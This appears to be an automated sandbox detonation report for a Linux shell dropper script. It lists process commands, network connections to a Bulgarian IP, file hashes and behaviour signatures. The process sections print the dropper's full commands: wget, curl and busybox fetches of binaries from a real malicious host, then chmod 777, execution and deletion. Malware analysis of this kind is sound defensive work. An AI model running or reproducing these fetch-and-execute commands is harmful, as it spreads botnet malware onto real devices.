/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
memory/868-1-0xb677a000-0xb678b044-memory.dmp
memory/869-2-0xb6792000-0xb67a3044-memory.dmp
memory/869-3-0xb6763000-0xb6774044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 02:53
Reported
2024-11-20 02:56
Platform
debian9-mipsbe-20240611-en
Max time kernel
88s
Max time network
90s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
Processes
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
